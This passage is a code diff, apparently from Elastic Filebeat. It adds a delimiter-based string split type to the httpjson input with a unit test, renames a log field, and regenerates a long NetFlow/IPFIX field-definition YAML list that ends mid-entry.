@@ -10,8 +10,9 @@ import ( ) const ( - splitTypeArr = "array" - splitTypeMap = "map" + splitTypeArr = "array" + splitTypeMap = "map" + splitTypeString = "string" ) type responseConfig struct { @@ -23,12 +24,13 @@ type responseConfig struct { } type splitConfig struct { - Target string `config:"target" validation:"required"` - Type string `config:"type"` - Transforms transformsConfig `config:"transforms"` - Split *splitConfig `config:"split"` - KeepParent bool `config:"keep_parent"` - KeyField string `config:"key_field"` + Target string `config:"target" validation:"required"` + Type string `config:"type"` + Transforms transformsConfig `config:"transforms"` + Split *splitConfig `config:"split"` + KeepParent bool `config:"keep_parent"` + KeyField string `config:"key_field"` + DelimiterString string `config:"delimiter"` } func (c *responseConfig) Validate() error { @@ -58,6 +60,10 @@ func (c *splitConfig) Validate() error { return fmt.Errorf("key_field can only be used with a %s split type", splitTypeMap) } case splitTypeMap: + case splitTypeString: + if c.DelimiterString == "" { + return fmt.Errorf("delimiter required for split type %s", splitTypeString) + } default: return fmt.Errorf("invalid split type: %s", c.Type) } diff --git a/x-pack/filebeat/input/httpjson/internal/v2/input.go b/x-pack/filebeat/input/httpjson/internal/v2/input.go index 8cf78b8adc7f..f9c76226818a 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/input.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/input.go @@ -104,7 +104,7 @@ func run( publisher inputcursor.Publisher, cursor *inputcursor.Cursor, ) error { - log := ctx.Logger.With("url", config.Request.URL) + log := ctx.Logger.With("input_url", config.Request.URL) stdCtx := ctxtool.FromCanceller(ctx.Cancelation) diff --git a/x-pack/filebeat/input/httpjson/internal/v2/split.go b/x-pack/filebeat/input/httpjson/internal/v2/split.go index 823b57c39fb1..9cb686e63adb 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/split.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/split.go @@ -7,16 +7,18 @@ package v2 import ( "errors" "fmt" + "strings" "github.com/elastic/beats/v7/libbeat/common" "github.com/elastic/beats/v7/libbeat/logp" ) var ( - errEmptyField = errors.New("the requested field is empty") - errEmptyRootField = errors.New("the requested root field is empty") - errExpectedSplitArr = errors.New("split was expecting field to be an array") - errExpectedSplitObj = errors.New("split was expecting field to be an object") + errEmptyField = errors.New("the requested field is empty") + errEmptyRootField = errors.New("the requested root field is empty") + errExpectedSplitArr = errors.New("split was expecting field to be an array") + errExpectedSplitObj = errors.New("split was expecting field to be an object") + errExpectedSplitString = errors.New("split was expecting field to be a string") ) type split struct { @@ -28,6 +30,7 @@ type split struct { keepParent bool keyField string isRoot bool + delimiter string } func newSplitResponse(cfg *splitConfig, log *logp.Logger) (*split, error) { @@ -73,6 +76,7 @@ func newSplit(c *splitConfig, log *logp.Logger) (*split, error) { kind: c.Type, keepParent: c.KeepParent, keyField: c.KeyField, + delimiter: c.DelimiterString, transforms: ts, child: s, }, nil @@ -139,6 +143,26 @@ func (s *split) split(ctx *transformContext, root common.MapStr, ch chan<- maybe } } + return nil + case splitTypeString: + vstr, ok := v.(string) + if !ok { + return errExpectedSplitString + } + + if len(vstr) == 0 { + if s.isRoot { + return errEmptyRootField + } + ch <- maybeMsg{msg: root} + return errEmptyField + } + for _, substr := range strings.Split(vstr, s.delimiter) { + if err := s.sendMessageSplitString(ctx, root, substr, ch); err != nil { + s.log.Debug(err) + } + } + return nil } @@ -195,3 +219,27 @@ func toMapStr(v interface{}) (common.MapStr, bool) { } return common.MapStr{}, false } + +func (s *split) sendMessageSplitString(ctx *transformContext, root common.MapStr, v string, ch chan<- maybeMsg) error { + clone := root.Clone() + _, _ = clone.Put(s.targetInfo.Name, v) + + tr := transformable{} + tr.setBody(clone) + + var err error + for _, t := range s.transforms { + tr, err = t.run(ctx, tr) + if err != nil { + return err + } + } + + if s.child != nil { + return s.child.split(ctx, clone, ch) + } + + ch <- maybeMsg{msg: clone} + + return nil +} diff --git a/x-pack/filebeat/input/httpjson/internal/v2/split_test.go b/x-pack/filebeat/input/httpjson/internal/v2/split_test.go index c6ad4a6170c3..2c53d0fcbe13 100644 --- a/x-pack/filebeat/input/httpjson/internal/v2/split_test.go +++ b/x-pack/filebeat/input/httpjson/internal/v2/split_test.go @@ -334,6 +334,26 @@ func TestSplit(t *testing.T) { {"baz": "buzz", "splitHere": common.MapStr{"splitMore": common.MapStr{"deepest2": "data"}}}, }, }, + { + name: "Split string", + config: &splitConfig{ + Target: "body.items", + Type: "string", + DelimiterString: "\n", + }, + ctx: emptyTransformContext(), + resp: transformable{ + "body": common.MapStr{ + "@timestamp": "1234567890", + "items": "Line 1\nLine 2\nLine 3", + }, + }, + expectedMessages: []common.MapStr{ + {"@timestamp": "1234567890", "items": "Line 1"}, + {"@timestamp": "1234567890", "items": "Line 2"}, + {"@timestamp": "1234567890", "items": "Line 3"}, + }, + }, } for _, tc := range cases { diff --git a/x-pack/filebeat/input/netflow/_meta/fields.header.yml b/x-pack/filebeat/input/netflow/_meta/fields.header.yml index 60e585ec2dfa..2b1b2aa6b8c2 100644 --- a/x-pack/filebeat/input/netflow/_meta/fields.header.yml +++ b/x-pack/filebeat/input/netflow/_meta/fields.header.yml @@ -5,6 +5,7 @@ fields: - name: netflow type: group + default_field: false description: > Fields from NetFlow and IPFIX. fields: diff --git a/x-pack/filebeat/input/netflow/_meta/fields.yml b/x-pack/filebeat/input/netflow/_meta/fields.yml index f5a4c0823d58..e9e0755d3757 100644 --- a/x-pack/filebeat/input/netflow/_meta/fields.yml +++ b/x-pack/filebeat/input/netflow/_meta/fields.yml @@ -1,3 +1,6 @@ +######################################## +# This file is generated. Do not modify. +######################################## - key: netflow title: "NetFlow" description: > @@ -5,6 +8,7 @@ fields: - name: netflow type: group + default_field: false description: > Fields from NetFlow and IPFIX. fields: @@ -43,1341 +47,3951 @@ description: > NetFlow version used. - - name: octet_delta_count + - name: absolute_error + type: double + + - name: address_pool_high_threshold type: long - - name: packet_delta_count + - name: address_pool_low_threshold type: long - - name: delta_flow_count + - name: address_port_mapping_high_threshold type: long - - name: protocol_identifier - type: short + - name: address_port_mapping_low_threshold + type: long - - name: ip_class_of_service - type: short + - name: address_port_mapping_per_user_high_threshold + type: long - - name: tcp_control_bits + - name: afc_protocol type: integer - - name: source_transport_port - type: integer + - name: afc_protocol_name + type: keyword - - name: source_ipv4_address - type: ip + - name: anonymization_flags + type: integer - - name: source_ipv4_prefix_length - type: short + - name: anonymization_technique + type: integer - - name: ingress_interface + - name: application_business-relevance type: long - - name: destination_transport_port - type: integer + - name: application_category_name + type: keyword - - name: destination_ipv4_address - type: ip + - name: application_description + type: keyword - - name: destination_ipv4_prefix_length - type: short + - name: application_group_name + type: keyword - - name: egress_interface - type: long + - name: application_http_uri_statistics + type: short - - name: ip_next_hop_ipv4_address - type: ip + - name: application_http_user-agent + type: short - - name: bgp_source_as_number - type: long + - name: application_id + type: short - - name: bgp_destination_as_number - type: long + - name: application_name + type: keyword - - name: bgp_next_hop_ipv4_address - type: ip + - name: application_sub_category_name + type: keyword - - name: post_mcast_packet_delta_count + - name: application_traffic-class type: long - - name: post_mcast_octet_delta_count + - name: art_client_network_time_maximum type: long - - name: flow_end_sys_up_time + - name: art_client_network_time_minimum type: long - - name: flow_start_sys_up_time + - name: art_client_network_time_sum type: long - - name: post_octet_delta_count + - name: art_clientpackets type: long - - name: post_packet_delta_count + - name: art_count_late_responses type: long - - name: minimum_ip_total_length + - name: art_count_new_connections type: long - - name: maximum_ip_total_length + - name: art_count_responses type: long - - name: source_ipv6_address - type: ip - - - name: destination_ipv6_address - type: ip - - - name: source_ipv6_prefix_length - type: short + - name: art_count_responses_histogram_bucket1 + type: long - - name: destination_ipv6_prefix_length - type: short + - name: art_count_responses_histogram_bucket2 + type: long - - name: flow_label_ipv6 + - name: art_count_responses_histogram_bucket3 type: long - - name: icmp_type_code_ipv4 - type: integer + - name: art_count_responses_histogram_bucket4 + type: long - - name: igmp_type - type: short + - name: art_count_responses_histogram_bucket5 + type: long - - name: sampling_interval + - name: art_count_responses_histogram_bucket6 type: long - - name: sampling_algorithm - type: short + - name: art_count_responses_histogram_bucket7 + type: long - - name: flow_active_timeout - type: integer + - name: art_count_retransmissions + type: long - - name: flow_idle_timeout - type: integer + - name: art_count_transactions + type: long - - name: engine_type - type: short + - name: art_network_time_maximum + type: long - - name: engine_id - type: short + - name: art_network_time_minimum + type: long - - name: exported_octet_total_count + - name: art_network_time_sum type: long - - name: exported_message_total_count + - name: art_response_time_maximum type: long - - name: exported_flow_record_total_count + - name: art_response_time_minimum type: long - - name: ipv4_router_sc - type: ip + - name: art_response_time_sum + type: long - - name: source_ipv4_prefix - type: ip + - name: art_server_network_time_maximum + type: long - - name: destination_ipv4_prefix - type: ip + - name: art_server_network_time_minimum + type: long - - name: mpls_top_label_type - type: short + - name: art_server_network_time_sum + type: long - - name: mpls_top_label_ipv4_address - type: ip + - name: art_server_response_time_maximum + type: long - - name: sampler_id - type: short + - name: art_server_response_time_minimum + type: long - - name: sampler_mode - type: short + - name: art_server_response_time_sum + type: long - - name: sampler_random_interval + - name: art_serverpackets type: long - - name: class_id + - name: art_total_response_time_maximum type: long - - name: minimum_ttl - type: short + - name: art_total_response_time_minimum + type: long - - name: maximum_ttl - type: short + - name: art_total_response_time_sum + type: long - - name: fragment_identification + - name: art_total_transaction_time_maximum type: long - - name: post_ip_class_of_service - type: short + - name: art_total_transaction_time_minimum + type: long - - name: source_mac_address - type: keyword + - name: art_total_transaction_time_sum + type: long - - name: post_destination_mac_address - type: keyword + - name: assembled_fragment_count + type: long - - name: vlan_id - type: integer + - name: audit_counter + type: long - - name: post_vlan_id - type: integer + - name: average_interarrival_time + type: long - - name: ip_version - type: short + - name: bgp_destination_as_number + type: long - - name: flow_direction - type: short + - name: bgp_next_adjacent_as_number + type: long - - name: ip_next_hop_ipv6_address + - name: bgp_next_hop_ipv4_address type: ip - name: bgp_next_hop_ipv6_address type: ip - - name: ipv6_extension_headers + - name: bgp_prev_adjacent_as_number type: long - - name: mpls_top_label_stack_section - type: short + - name: bgp_source_as_number + type: long - - name: mpls_label_stack_section2 + - name: bgp_validity_state type: short - - name: mpls_label_stack_section3 + - name: biflow_direction type: short - - name: mpls_label_stack_section4 - type: short + - name: bind_ipv4_address + type: ip - - name: mpls_label_stack_section5 - type: short + - name: bind_transport_port + type: integer - - name: mpls_label_stack_section6 - type: short + - name: class_id + type: long - - name: mpls_label_stack_section7 - type: short + - name: class_name + type: keyword - - name: mpls_label_stack_section8 + - name: classification_engine_id type: short - - name: mpls_label_stack_section9 - type: short + - name: collection_time_milliseconds + type: date - - name: mpls_label_stack_section10 + - name: collector_certificate type: short - - name: destination_mac_address - type: keyword + - name: collector_ipv4_address + type: ip - - name: post_source_mac_address - type: keyword + - name: collector_ipv6_address + type: ip - - name: interface_name - type: keyword + - name: collector_transport_port + type: integer - - name: interface_description - type: keyword + - name: common_properties_id + type: long - - name: sampler_name - type: keyword + - name: confidence_level + type: double - - name: octet_total_count + - name: conn_ipv4_address + type: ip + + - name: conn_transport_port + type: integer + + - name: connection_sum_duration_seconds type: long - - name: packet_total_count + - name: connection_transaction_id type: long - - name: flags_and_sampler_id + - name: conntrack_id type: long - - name: fragment_offset - type: integer + - name: data_byte_count + type: long - - name: forwarding_status + - name: data_link_frame_section type: short - - name: mpls_vpn_route_distinguisher - type: short + - name: data_link_frame_size + type: integer - - name: mpls_top_label_prefix_length - type: short + - name: data_link_frame_type + type: integer - - name: src_traffic_index - type: long + - name: data_records_reliability + type: boolean - - name: dst_traffic_index + - name: delta_flow_count type: long - - name: application_description - type: keyword - - - name: application_id - type: short + - name: destination_ipv4_address + type: ip - - name: application_name - type: keyword + - name: destination_ipv4_prefix + type: ip - - name: post_ip_diff_serv_code_point + - name: destination_ipv4_prefix_length type: short - - name: multicast_replication_factor - type: long + - name: destination_ipv6_address + type: ip - - name: class_name - type: keyword + - name: destination_ipv6_prefix + type: ip - - name: classification_engine_id + - name: destination_ipv6_prefix_length type: short - - name: layer2packet_section_offset - type: integer + - name: destination_mac_address + type: keyword - - name: layer2packet_section_size + - name: destination_transport_port type: integer - - name: layer2packet_section_data - type: short - - - name: bgp_next_adjacent_as_number + - name: digest_hash_value type: long - - name: bgp_prev_adjacent_as_number + - name: distinct_count_of_destination_ip_address type: long - - name: exporter_ipv4_address - type: ip - - - name: exporter_ipv6_address - type: ip + - name: distinct_count_of_destination_ipv4_address + type: long - - name: dropped_octet_delta_count + - name: distinct_count_of_destination_ipv6_address type: long - - name: dropped_packet_delta_count + - name: distinct_count_of_source_ip_address type: long - - name: dropped_octet_total_count + - name: distinct_count_of_source_ipv4_address type: long - - name: dropped_packet_total_count + - name: distinct_count_of_source_ipv6_address type: long - - name: flow_end_reason + - name: dns_authoritative type: short - - name: common_properties_id - type: long + - name: dns_cname + type: keyword - - name: observation_point_id - type: long + - name: dns_id + type: integer - - name: icmp_type_code_ipv6 + - name: dns_mx_exchange + type: keyword + + - name: dns_mx_preference type: integer - - name: mpls_top_label_ipv6_address - type: ip + - name: dns_nsd_name + type: keyword - - name: line_card_id + - name: dns_nx_domain + type: short + + - name: dns_ptrd_name + type: keyword + + - name: dns_qname + type: keyword + + - name: dns_qr_type + type: integer + + - name: dns_query_response + type: short + + - name: dns_rr_section + type: short + + - name: dns_soa_expire type: long - - name: port_id + - name: dns_soa_minimum type: long - - name: metering_process_id + - name: dns_soa_refresh type: long - - name: exporting_process_id + - name: dns_soa_retry type: long - - name: template_id - type: integer + - name: dns_soa_serial + type: long - - name: wlan_channel_id - type: short + - name: dns_soam_name + type: keyword - - name: wlan_ssid + - name: dns_soar_name type: keyword - - name: flow_id - type: long + - name: dns_srv_port + type: integer - - name: observation_domain_id + - name: dns_srv_priority + type: integer + + - name: dns_srv_target + type: integer + + - name: dns_srv_weight + type: integer + + - name: dns_ttl type: long - - name: flow_start_seconds - type: date + - name: dns_txt_data + type: keyword - - name: flow_end_seconds - type: date + - name: dot1q_customer_dei + type: boolean - - name: flow_start_milliseconds - type: date + - name: dot1q_customer_destination_mac_address + type: keyword - - name: flow_end_milliseconds - type: date + - name: dot1q_customer_priority + type: short - - name: flow_start_microseconds - type: date + - name: dot1q_customer_source_mac_address + type: keyword - - name: flow_end_microseconds - type: date + - name: dot1q_customer_vlan_id + type: integer - - name: flow_start_nanoseconds - type: date + - name: dot1q_dei + type: boolean - - name: flow_end_nanoseconds - type: date + - name: dot1q_priority + type: short - - name: flow_start_delta_microseconds + - name: dot1q_service_instance_id type: long - - name: flow_end_delta_microseconds - type: long + - name: dot1q_service_instance_priority + type: short - - name: system_init_time_milliseconds - type: date + - name: dot1q_service_instance_tag + type: short - - name: flow_duration_milliseconds - type: long + - name: dot1q_vlan_id + type: integer - - name: flow_duration_microseconds + - name: dropped_layer2_octet_delta_count type: long - - name: observed_flow_total_count + - name: dropped_layer2_octet_total_count type: long - - name: ignored_packet_total_count + - name: dropped_octet_delta_count type: long - - name: ignored_octet_total_count + - name: dropped_octet_total_count type: long - - name: not_sent_flow_total_count + - name: dropped_packet_delta_count type: long - - name: not_sent_packet_total_count + - name: dropped_packet_total_count type: long - - name: not_sent_octet_total_count + - name: dst_traffic_index type: long - - name: destination_ipv6_prefix - type: ip - - - name: source_ipv6_prefix - type: ip + - name: egress_broadcast_packet_total_count + type: long - - name: post_octet_total_count + - name: egress_interface type: long - - name: post_packet_total_count + - name: egress_interface_type type: long - - name: flow_key_indicator + - name: egress_physical_interface type: long - - name: post_mcast_packet_total_count + - name: egress_unicast_packet_total_count type: long - - name: post_mcast_octet_total_count + - name: egress_vrfid type: long - - name: icmp_type_ipv4 - type: short + - name: encrypted_technology + type: keyword - - name: icmp_code_ipv4 + - name: engine_id type: short - - name: icmp_type_ipv6 + - name: engine_type type: short - - name: icmp_code_ipv6 + - name: ethernet_header_length type: short - - name: udp_source_port - type: integer - - - name: udp_destination_port + - name: ethernet_payload_length type: integer - - name: tcp_source_port + - name: ethernet_total_length type: integer - - name: tcp_destination_port + - name: ethernet_type type: integer - - name: tcp_sequence_number + - name: expired_fragment_count type: long - - name: tcp_acknowledgement_number + - name: export_interface type: long - - name: tcp_window_size - type: integer + - name: export_protocol_version + type: short - - name: tcp_urgent_pointer + - name: export_sctp_stream_id type: integer - - name: tcp_header_length + - name: export_transport_protocol type: short - - name: ip_header_length - type: short + - name: exported_flow_record_total_count + type: long - - name: total_length_ipv4 - type: integer + - name: exported_message_total_count + type: long - - name: payload_length_ipv6 - type: integer + - name: exported_octet_total_count + type: long - - name: ip_ttl + - name: exporter_certificate type: short - - name: next_header_ipv6 - type: short + - name: exporter_ipv4_address + type: ip - - name: mpls_payload_length + - name: exporter_ipv6_address + type: ip + + - name: exporter_transport_port + type: integer + + - name: exporting_process_id type: long - - name: ip_diff_serv_code_point + - name: external_address_realm type: short - - name: ip_precedence + - name: firewall_event type: short - - name: fragment_flags + - name: first_eight_non_empty_packet_directions type: short - - name: octet_delta_sum_of_squares - type: long - - - name: octet_total_sum_of_squares - type: long - - - name: mpls_top_label_ttl - type: short + - name: first_non_empty_packet_size + type: integer - - name: mpls_label_stack_length - type: long + - name: first_packet_banner + type: keyword - - name: mpls_label_stack_depth + - name: flags_and_sampler_id type: long - - name: mpls_top_label_exp - type: short - - - name: ip_payload_length - type: long + - name: flow_active_timeout + type: integer - - name: udp_message_length + - name: flow_attributes type: integer - - name: is_multicast + - name: flow_direction type: short - - name: ipv4_ihl - type: short + - name: flow_duration_microseconds + type: long - - name: ipv4_options + - name: flow_duration_milliseconds type: long - - name: tcp_options + - name: flow_end_delta_microseconds type: long - - name: padding_octets - type: short + - name: flow_end_microseconds + type: date - - name: collector_ipv4_address - type: ip - - - name: collector_ipv6_address - type: ip + - name: flow_end_milliseconds + type: date - - name: export_interface - type: long + - name: flow_end_nanoseconds + type: date - - name: export_protocol_version + - name: flow_end_reason type: short - - name: export_transport_protocol - type: short + - name: flow_end_seconds + type: date - - name: collector_transport_port - type: integer + - name: flow_end_sys_up_time + type: long - - name: exporter_transport_port + - name: flow_id + type: long + + - name: flow_idle_timeout type: integer - - name: tcp_syn_total_count + - name: flow_key_indicator type: long - - name: tcp_fin_total_count + - name: flow_label_ipv6 type: long - - name: tcp_rst_total_count + - name: flow_sampling_time_interval type: long - - name: tcp_psh_total_count + - name: flow_sampling_time_spacing type: long - - name: tcp_ack_total_count + - name: flow_selected_flow_delta_count type: long - - name: tcp_urg_total_count + - name: flow_selected_octet_delta_count type: long - - name: ip_total_length + - name: flow_selected_packet_delta_count type: long - - name: post_nat_source_ipv4_address - type: ip + - name: flow_selector_algorithm + type: integer - - name: post_nat_destination_ipv4_address - type: ip + - name: flow_start_delta_microseconds + type: long - - name: post_napt_source_transport_port - type: integer + - name: flow_start_microseconds + type: date - - name: post_napt_destination_transport_port - type: integer + - name: flow_start_milliseconds + type: date - - name: nat_originating_address_realm - type: short + - name: flow_start_nanoseconds + type: date - - name: nat_event - type: short + - name: flow_start_seconds + type: date - - name: initiator_octets + - name: flow_start_sys_up_time type: long - - name: responder_octets + - name: flow_table_flush_event_count type: long - - name: firewall_event + - name: flow_table_peak_count + type: long + + - name: forwarding_status type: short - - name: ingress_vrfid - type: long + - name: fragment_flags + type: short - - name: egress_vrfid + - name: fragment_identification type: long - - name: vr_fname - type: keyword + - name: fragment_offset + type: integer - - name: post_mpls_top_label_exp - type: short + - name: fw_blackout_secs + type: long - - name: tcp_window_scale - type: integer + - name: fw_configured_value + type: long - - name: biflow_direction - type: short + - name: fw_cts_src_sgt + type: long - - name: ethernet_header_length - type: short + - name: fw_event_level + type: long - - name: ethernet_payload_length - type: integer + - name: fw_event_level_id + type: long - - name: ethernet_total_length + - name: fw_ext_event type: integer - - name: dot1q_vlan_id - type: integer + - name: fw_ext_event_alt + type: long - - name: dot1q_priority - type: short + - name: fw_ext_event_desc + type: keyword - - name: dot1q_customer_vlan_id - type: integer + - name: fw_half_open_count + type: long - - name: dot1q_customer_priority - type: short + - name: fw_half_open_high + type: long - - name: metro_evc_id - type: keyword + - name: fw_half_open_rate + type: long - - name: metro_evc_type - type: short + - name: fw_max_sessions + type: long - - name: pseudo_wire_id + - name: fw_rule + type: keyword + + - name: fw_summary_pkt_count type: long - - name: pseudo_wire_type - type: integer + - name: fw_zone_pair_id + type: long - - name: pseudo_wire_control_word + - name: fw_zone_pair_name type: long - - name: ingress_physical_interface + - name: global_address_mapping_high_threshold type: long - - name: egress_physical_interface + - name: gre_key type: long - - name: post_dot1q_vlan_id - type: integer + - name: hash_digest_output + type: boolean - - name: post_dot1q_customer_vlan_id + - name: hash_flow_domain type: integer - - name: ethernet_type - type: integer + - name: hash_initialiser_value + type: long - - name: post_ip_precedence - type: short + - name: hash_ip_payload_offset + type: long - - name: collection_time_milliseconds - type: date + - name: hash_ip_payload_size + type: long - - name: export_sctp_stream_id - type: integer + - name: hash_output_range_max + type: long - - name: max_export_seconds - type: date + - name: hash_output_range_min + type: long - - name: max_flow_end_seconds - type: date + - name: hash_selected_range_max + type: long - - name: message_md5_checksum - type: short + - name: hash_selected_range_min + type: long - - name: message_scope - type: short + - name: http_content_type + type: keyword - - name: min_export_seconds - type: date + - name: http_message_version + type: keyword - - name: min_flow_start_seconds - type: date + - name: http_reason_phrase + type: keyword - - name: opaque_octets - type: short + - name: http_request_host + type: keyword - - name: session_scope - type: short + - name: http_request_method + type: keyword - - name: max_flow_end_microseconds - type: date + - name: http_request_target + type: keyword - - name: max_flow_end_milliseconds - type: date + - name: http_status_code + type: integer - - name: max_flow_end_nanoseconds - type: date + - name: http_user_agent + type: keyword - - name: min_flow_start_microseconds - type: date + - name: icmp_code_ipv4 + type: short - - name: min_flow_start_milliseconds - type: date + - name: icmp_code_ipv6 + type: short - - name: min_flow_start_nanoseconds - type: date + - name: icmp_type_code_ipv4 + type: integer - - name: collector_certificate - type: short + - name: icmp_type_code_ipv6 + type: integer - - name: exporter_certificate + - name: icmp_type_ipv4 type: short - - name: data_records_reliability - type: boolean + - name: icmp_type_ipv6 + type: short - - name: observation_point_type + - name: igmp_type type: short - - name: new_connection_delta_count + - name: ignored_data_record_total_count type: long - - name: connection_sum_duration_seconds + - name: ignored_layer2_frame_total_count type: long - - name: connection_transaction_id + - name: ignored_layer2_octet_total_count type: long - - name: post_nat_source_ipv6_address - type: ip - - - name: post_nat_destination_ipv6_address - type: ip + - name: ignored_octet_total_count + type: long - - name: nat_pool_id + - name: ignored_packet_total_count type: long - - name: nat_pool_name - type: keyword + - name: information_element_data_type + type: short - - name: anonymization_flags - type: integer + - name: information_element_description + type: keyword - - name: anonymization_technique + - name: information_element_id type: integer - name: information_element_index type: integer - - name: p2p_technology + - name: information_element_name type: keyword - - name: tunnel_technology - type: keyword + - name: information_element_range_begin + type: long - - name: encrypted_technology - type: keyword + - name: information_element_range_end + type: long - - name: bgp_validity_state + - name: information_element_semantics type: short - - name: ip_sec_spi - type: long + - name: information_element_units + type: integer - - name: gre_key + - name: ingress_broadcast_packet_total_count type: long - - name: nat_type - type: short - - - name: initiator_packets + - name: ingress_interface type: long - - name: responder_packets + - name: ingress_interface_type type: long - - name: observation_domain_name - type: keyword - - - name: selection_sequence_id + - name: ingress_multicast_packet_total_count type: long - - name: selector_id + - name: ingress_physical_interface type: long - - name: information_element_id - type: integer - - - name: selector_algorithm - type: integer - - - name: sampling_packet_interval + - name: ingress_unicast_packet_total_count type: long - - name: sampling_packet_space + - name: ingress_vrfid type: long - - name: sampling_time_interval - type: long + - name: initial_tcp_flags + type: short - - name: sampling_time_space + - name: initiator_octets type: long - - name: sampling_size + - name: initiator_packets type: long - - name: sampling_population - type: long + - name: interface_description + type: keyword - - name: sampling_probability - type: double + - name: interface_name + type: keyword - - name: data_link_frame_size - type: integer + - name: intermediate_process_id + type: long - - name: ip_header_packet_section + - name: internal_address_realm type: short - - name: ip_payload_packet_section + - name: ip_class_of_service type: short - - name: data_link_frame_section + - name: ip_diff_serv_code_point type: short - - name: mpls_label_stack_section + - name: ip_header_length type: short - - name: mpls_payload_packet_section + - name: ip_header_packet_section type: short - - name: selector_id_total_pkts_observed - type: long + - name: ip_next_hop_ipv4_address + type: ip - - name: selector_id_total_pkts_selected - type: long + - name: ip_next_hop_ipv6_address + type: ip - - name: absolute_error - type: double + - name: ip_payload_length + type: long - - name: relative_error - type: double + - name: ip_payload_packet_section + type: short - - name: observation_time_seconds - type: date + - name: ip_precedence + type: short - - name: observation_time_milliseconds - type: date + - name: ip_sec_spi + type: long - - name: observation_time_microseconds - type: date + - name: ip_total_length + type: long - - name: observation_time_nanoseconds - type: date + - name: ip_ttl + type: short - - name: digest_hash_value - type: long + - name: ip_version + type: short - - name: hash_ip_payload_offset - type: long + - name: ipv4_ihl + type: short - - name: hash_ip_payload_size + - name: ipv4_options type: long - - name: hash_output_range_min - type: long + - name: ipv4_router_sc + type: ip - - name: hash_output_range_max + - name: ipv6_extension_headers type: long - - name: hash_selected_range_min - type: long + - name: is_multicast + type: short - - name: hash_selected_range_max - type: long + - name: ixia_browser_id + type: short - - name: hash_digest_output - type: boolean + - name: ixia_browser_name + type: keyword - - name: hash_initialiser_value - type: long + - name: ixia_device_id + type: short - - name: selector_name + - name: ixia_device_name type: keyword - - name: upper_ci_limit - type: double + - name: ixia_dns_answer + type: keyword - - name: lower_ci_limit - type: double + - name: ixia_dns_classes + type: keyword - - name: confidence_level - type: double + - name: ixia_dns_query + type: keyword - - name: information_element_data_type - type: short + - name: ixia_dns_record_txt + type: keyword - - name: information_element_description + - name: ixia_dst_as_name type: keyword - - name: information_element_name + - name: ixia_dst_city_name type: keyword - - name: information_element_range_begin - type: long + - name: ixia_dst_country_code + type: keyword - - name: information_element_range_end - type: long + - name: ixia_dst_country_name + type: keyword - - name: information_element_semantics - type: short + - name: ixia_dst_latitude + type: float - - name: information_element_units - type: integer + - name: ixia_dst_longitude + type: float - - name: private_enterprise_number - type: long + - name: ixia_dst_region_code + type: keyword - - name: virtual_station_interface_id - type: short + - name: ixia_dst_region_node + type: keyword - - name: virtual_station_interface_name + - name: ixia_encrypt_cipher type: keyword - - name: virtual_station_uuid - type: short + - name: ixia_encrypt_key_length + type: integer - - name: virtual_station_name + - name: ixia_encrypt_type type: keyword - - name: layer2_segment_id - type: long + - name: ixia_http_host_name + type: keyword - - name: layer2_octet_delta_count - type: long + - name: ixia_http_uri + type: keyword - - name: layer2_octet_total_count - type: long + - name: ixia_http_user_agent + type: keyword - - name: ingress_unicast_packet_total_count - type: long + - name: ixia_imsi_subscriber + type: keyword - - name: ingress_multicast_packet_total_count + - name: ixia_l7_app_id type: long - - name: ingress_broadcast_packet_total_count - type: long + - name: ixia_l7_app_name + type: keyword - - name: egress_unicast_packet_total_count + - name: ixia_latency type: long - - name: egress_broadcast_packet_total_count + - name: ixia_rev_octet_delta_count type: long - - name: monitoring_interval_start_milli_seconds - type: date - - - name: monitoring_interval_end_milli_seconds - type: date - - - name: port_range_start - type: integer - - - name: port_range_end - type: integer - - - name: port_range_step_size - type: integer - - - name: port_range_num_ports - type: integer + - name: ixia_rev_packet_delta_count + type: long - - name: sta_mac_address + - name: ixia_src_as_name type: keyword - - name: sta_ipv4_address - type: ip + - name: ixia_src_city_name + type: keyword - - name: wtp_mac_address + - name: ixia_src_country_code type: keyword - - name: ingress_interface_type - type: long + - name: ixia_src_country_name + type: keyword - - name: egress_interface_type - type: long + - name: ixia_src_latitude + type: float - - name: rtp_sequence_number - type: integer + - name: ixia_src_longitude + type: float - - name: user_name + - name: ixia_src_region_code type: keyword - - name: application_category_name + - name: ixia_src_region_name type: keyword - - name: application_sub_category_name - type: keyword + - name: ixia_threat_ipv4 + type: ip - - name: application_group_name - type: keyword + - name: ixia_threat_ipv6 + type: ip - - name: original_flows_present - type: long + - name: ixia_threat_type + type: keyword - - name: original_flows_initiated + - name: large_packet_count type: long - - name: original_flows_completed + - name: layer2_frame_delta_count type: long - - name: distinct_count_of_source_ip_address + - name: layer2_frame_total_count type: long - - name: distinct_count_of_destination_ip_address + - name: layer2_octet_delta_count type: long - - name: distinct_count_of_source_ipv4_address + - name: layer2_octet_delta_sum_of_squares type: long - - name: distinct_count_of_destination_ipv4_address + - name: layer2_octet_total_count type: long - - name: distinct_count_of_source_ipv6_address + - name: layer2_octet_total_sum_of_squares type: long - - name: distinct_count_of_destination_ipv6_address + - name: layer2_segment_id type: long - - name: value_distribution_method + - name: layer2packet_section_data type: short - - name: rfc3550_jitter_milliseconds - type: long + - name: layer2packet_section_offset + type: integer - - name: rfc3550_jitter_microseconds - type: long + - name: layer2packet_section_size + type: integer - - name: rfc3550_jitter_nanoseconds + - name: line_card_id type: long - - name: dot1q_dei - type: boolean - - - name: dot1q_customer_dei - type: boolean - - - name: flow_selector_algorithm - type: integer + - name: log_op + type: short - - name: flow_selected_octet_delta_count - type: long + - name: lower_ci_limit + type: double - - name: flow_selected_packet_delta_count + - name: mark type: long - - name: flow_selected_flow_delta_count + - name: max_bib_entries type: long - - name: selector_id_total_flows_observed + - name: max_entries_per_user type: long - - name: selector_id_total_flows_selected + - name: max_export_seconds + type: date + + - name: max_flow_end_microseconds + type: date + + - name: max_flow_end_milliseconds + type: date + + - name: max_flow_end_nanoseconds + type: date + + - name: max_flow_end_seconds + type: date + + - name: max_fragments_pending_reassembly + type: long + + - name: max_packet_size + type: integer + + - name: max_session_entries + type: long + + - name: max_subscribers + type: long + + - name: maximum_ip_total_length + type: long + + - name: maximum_layer2_total_length + type: long + + - name: maximum_ttl + type: short + + - name: mean_flow_rate + type: long + + - name: mean_packet_rate + type: long + + - name: message_md5_checksum + type: short + + - name: message_scope + type: short + + - name: metering_process_id + type: long + + - name: metro_evc_id + type: keyword + + - name: metro_evc_type + type: short + + - name: 